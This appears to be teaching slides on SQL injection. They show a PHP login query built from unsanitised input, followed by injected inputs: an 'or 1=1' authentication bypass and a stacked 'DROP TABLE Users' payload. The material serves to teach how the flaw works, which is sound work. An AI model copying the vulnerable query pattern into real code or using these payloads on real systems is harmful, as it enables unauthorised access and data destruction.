Using SQL

Form provides two fields: username and password.

• Both are controlled by external entities (users).

Objective:

• Check if the username and password provided exist in the database.

• Obtain the user data if it exists, and move to authorization phase.

• Otherwise, do not authenticate and provide an error.

Vulnerable validation code (PHP):

$result = mysql_query(“SELECT * FROM Users WHERE(username=‘$username’ AND password=‘$password’);”);

Exploiting SQLi

$result = mysql_query(“ SELECT * FROM Users WHERE(username=‘john’ AND password=‘abc’);”);

It will fail because the <username,password> don’t match and no result is provided.

$result = mysql_query(“ SELECT * FROM Users WHERE(username=‘john’ or 1=1); -- ’ AND password=‘abc’);”);

It will be successful because 1=1 is always true.

• The username is ignored because the second part is always true.

• The remaining of the query is ignored due to the comment.

$result = mysql_query(“ SELECT * FROM Users WHERE(username=‘’ or 1=1);DROP TABLE Users; --’ AND password=‘a’);”);

Two queries may be executed:

• SELECT which returns all users.

• DROP TABLE Users, which effectively deletes the Table.